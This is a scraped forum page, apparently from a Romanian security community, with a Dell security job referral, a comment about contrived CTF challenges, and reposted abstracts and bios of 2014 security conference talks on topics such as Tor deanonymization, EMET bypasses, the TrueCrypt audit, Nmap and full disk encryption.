5+ years' experience in IT industry including at least 2 from the Information Security sector with a focus on Incident Response • Emerging information security technologies and development methodologies • UNIX, Linux, and Microsoft operating systems • Security software and tools • PCI compliance • Superior communication, organization, and interpersonal skills and a demonstrated effectiveness in a customer facing role. Company Description With more than 100,000 team members globally, we promote an environment that is rooted in the entrepreneurial spirit in which the company was founded. Dell's team members are committed to serving our communities, regularly volunteering for over 1,500 non-profit organizations. The company has also received many accolades from employer of choice to energy conservation. Our team members follow an open approach to technology innovation and believe that technology is essential for human success. Why work with us? - Life at Dell means collaborating with dedicated professionals with a passion for technology. - When we see something that could be improved, we get to work inventing the solution. - Our people demonstrate our winning culture through positive and meaningful relationships. - We invest in our people and offer a series of programs that enables them to pursue a career that fulfills their potential. - Our team members' health and wellness is our priority as well as rewarding them for their hard work. Link: https://dell.referrals.selectminds.com/jobs/security-analysis-sr-advisor-39919?et=FvAn1Ukf Sau imi dati mie CV-ul daca sunteti interesati si il dau mai departe.

In general, la CTF-uri, apar chestii absurde in functie de cine face challenge-ul: - Daca ii plac anime, baga un text si cica sa iti dai seama de cine stie ce personaj din acel anime - Daca ii place Sasha Grey baga un "Aa oo aaa oo uuuuuu" si trebuie sa iti dai seama de numele filmului (glumesc) - Daca i se scoala sa puna cate un bit pe pozitia 7 dintr-o imagine sa iti dai seama tu de ideea lui de cand era fumat - Daca vrea el sa faca sirul fibbonaci cu numarul pixelilor dintr-o imagine sa iti dai tu seama de asta In fine, cred ca ai inteles ideea. E ceea ce nu imi place mie si cred ca multora nu le place: rezolvarea unei idei STUPIDE, care nu are deloc de-a face cu tehnica sau skill-urile competitorilor. Vor fi astfel de challenge-uri?

Dropping Docs On Darknets: How People Got Caught Adrian Crenshaw ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Most of you have probably used Tor before, but I2P may be unfamiliar. Both are anonymization networks that allow people to obfuscate where their traffic is coming from, and also host services (web sites for example) without it being tied back to them. This talk will give an overview of both, but will focus on real world stories of how people were deanonymized. Example cases like Eldo Kim & the Harvard Bomb Threat, Hector Xavier Monsegur (Sabu)/Jeremy Hammond (sup_g) & LulzSec, Freedom Hosting & Eric Eoin Marques and finally Ross William Ulbricht/“Dread Pirate Roberts” of the SilkRoad, will be used to explain how people have been caught and how it could have been avoided. Bio: Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for awhile (MCSE NT 4, CNE, A+, Network+. i-Net+) but stopped once he had to start paying for the tests himself. He holds a Master of Science in Security Informatics and is also one of the co-founders of Derbycon. Sursa: Dropping Docs On Darknets: How People Got Caught - Adrian Crenshaw (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

Thinking Outside The (Sand)Box Kyle Adams ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Incorporating sandboxing and heuristic-based malware detection to security solutions is the new black. Unfortunately, malware writers know this too and are designing their exploits to only run once clearing any sandboxes. If they can avoid getting analyzed and detected as malware, they will also avoid having a signature written and published. This seems like bad news for malware protection, but maybe not. It’s possible to trick evasive malware into thinking it’s continually running in a sandbox (even though it’s not) so it never executes its payload. This inoculates targeted machines from malware designed to evade sandbox analysis. My presentation will demonstrate some of the techniques modern malware uses to determine if it is running in a sandbox or being analyzed. I will also share deceptive techniques available to anyone, which can be used to inoculate a machine from being infected by these types of attacks. Thinking Outside the [sand]box. No antivirus necessary. Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus has been on web security threats like SQLi, XSS, CSRF, etc… but more recently he has started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos Web App Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space. Sursa: Thinking Outside The (Sand)Box - Kyle Adams (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

Bypassing EMET 4.1 Jared DeMott @jareddemott BSides Chicago 2014 The goal of this study is to gauge how difficult it is to bypass the protections offered by EMET, a popular Microsoft zero-day prevention capability. We initially focused on just the ROP protections, but later expanded the study to include a real world example. We were able to bypass EMET’s protections in example code and with a real world browser exploit. The primary novel elements in our research are: Deep study regarding the ROP protections, using example applications to show how to bypass each of the five ROP checks in a generic manner. Detailed real world example showing how to defeat all relevant protections. Look for a new technique to bypass the stack pivot protection, shellcode complete with an EAF bypass, and more. These bypasses leverage generic limitations, and not easily repaired. The impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection. This is true of EMET andother similar userland protections. Sursa: Bypassing EMET 4.1 - Jared DeMott - @jareddemott (BSides Chicago 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

The TrueCrypt audit- How it happened and what we found — Kenneth White Circle City Con 2014 Circle City Con Indy's First Hackercon Abstract: TrueCrypt is an open source file and whole disk encryption software package that runs on Windows, Macs, and Linux. It has been downloaded nearly 30 million times, and is one of the most popular security tools used by journalists, human rights activists, and countless organizations around the globe. In the 10 years since its original release by an anonymous development team, however, there had never been a formal cryptanalysis and security audit of the software. This presentation is about how the TrueCrypt Audit Project came to pass and how some of the best security minds, cryptographic engineers and privacy advocates in the world came together to successfully conduct a public, crowd-funded, open technical audit of this software. Details of our findings and the many lessons learned along the way will be presented. Any and all questions will be answered! Sursa: The TrueCrypt audit- How it happened and what we found — Kenneth White (Circle City Con 2014 Videos) (Hacking Illustrated Series InfoSec Tutorial Videos)

Pentesting Layers 2 and 3 Kevin Gennuso and Eric Mikulas Lower level network protocols have been around for decades and haven't changed much in that time. A number of tools to exploit weaknesses in those protocols have been released over the years, and those haven't changed much either. What has changed is the hardware. Routers used to be bulky, expensive, and proprietary. Now they are small, cheap, and open source. What better way is there to attack network gear than with another piece of network gear? This presentation will focus on layer 2 and layer 3 protocols, their weaknesses, and how to protect against exploitation. We'll revisit tools such as hping, Nemesis, Yersinia, and Loki and show how they can be used to attack vulnerable networks. Finally, we'll demonstrate our ports of these tools for use on routers that run OpenWRT. Kevin is a security testing manager and part time packet herder. He has over 17 years of experience in information security and network architecture, and has done work for a number of organizations ranging from dot-com era startups to large financial institutions. Eric is a software developer and pre-"maker" maker. He has been writing code and wielding a soldering iron since second grade. He has over 10 years of experience as a developer and has worked for a variety of companies both as a full-time employee and independent contractor. Sursa: Pentesting Layers 2 and 3 - Kevin Gennuso and Eric Mikulas Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)

Attacking and Defending Full Disk Encryption Tom Kopchak One of your company’s laptops was just stolen. You know that there was sensitive information on the machine. You also know that full disk encryption was deployed. Is your data safe? Can you prove it? Many organizations are flocking to full disk encryption solutions as a solution to their data security requirements. Unfortunately, many of these installations view the deployment of full disk encryption as a panacea for any and all security concerns for their laptop fleets. All too often, these systems are not properly configured and adequately tested. In this talk, Tom will analyze the challenges associated with attacking and defending systems protected with full disk encryption. Many of the examples provided will draw from Tom's personal experience, including several scenarios where a fully encrypted and powered down system was fully compromised as part of a penetration test. Tom Kopchak is a Senior Security Engineer at Hurricane Labs, an Information Security Firm in Cleveland, Ohio. Tom is an alum of the Rochester Institute of Technology, with a background in Computing Security and Information Security (MS) and Applied Networking and System Administration(BS). Tom’s passion for information security stems from his experiences in the Collegiate Cyber Defense Competition. His research areas include computer forensics and data storage technologies. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ. Sursa: Attacking and Defending Full Disk Encryption - Tom Kopchak Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)

Nmap Class for Hackers For Charity This is the Nmap class the Kentuckiana ISSA put on to support Hackers For Charity. Speakers include Jeremy Druin @webpwnized, Martin Bos @purehate_ and me @irongeek_adc. If you like the videos, please consider donating to Hackers For Charity. Nmap Class HFC Louisville ISSA Intro Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 1 Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 2 Nmap Class HFC Louisville ISSA OS And Service Fingerprinting Part 1 Nmap Class HFC Louisville ISSA Kicking Ass With Nmap Nmap Class HFC Louisville ISSA Closing Sursa: Nmap Class for Hackers For Charity - Louisville ISSA (Hacking Illustrated Series InfoSec Tutorial Videos)

Introduction to hacking with PowerShell - Scott Busby Sursa: Introduction to hacking with PowerShell - Scott Busby (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

HTTPS: Now You See Me - Tim Mullican Sursa: HTTPS: Now You See Me - Tim Mullican (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)

3D Printing for Work and Fun Mirabela Rusu Notacon 11 Sursa: 3D Printing for Work and Fun (temp title) - Mirabela Rusu Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)

Nindroid: Pentesting Apps for your Android device Michael Palumbo Notacon 11 Synopsis We explore the different “apps” available for the android platform that one can use for Local Area Network (LAN) pen testing and mischief. We will try to cover both the well known and newly available android applications for for basic hacking needs and have a few laughs along the way. Bio Michael is a 31 year old computer researcher, Michael focuses his projects depending upon what his interest may be that week. Sursa: Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)

Pwning the POS! Mick Douglas Notacon 11 Synopsis Everybody’s talking about the Target breach. However, there’s lots wrong with the retail space… and it’s been this way for quite some time! Focusing on Point of Sale (POS) systems this talk will show you how to exploit friendly the POS ecosystem really is, and how you can help fix things. Bio Mick likes to hack stuff. Of late, this means embedded systems. When he’s not “geeking it up” he goes on hikes and stuff to get away from das Blinkenlights. Sursa: Pwning the POS! - Mick Douglas Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)

Wireless Mesh Protocols Alex Kot Notacon 11 Synopsis I plan to explain different ad-hoc mesh protocols and the difference between them. I also plan to go indepth with a decentralized approach called Better Approach to Mobile Ad-Hoc Networking (B.A.T.M.A.N.) that will be beneficial in a society absent of net neutrality. Bio IT specialist that currently works at a credit union. Fond of open source software and a hobbyist of all technologies. I am an enthusiast for embedded open source router firmware as you can see on my youtube channel. Sursa: Wireless Mesh Protocols - Alex Kot Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)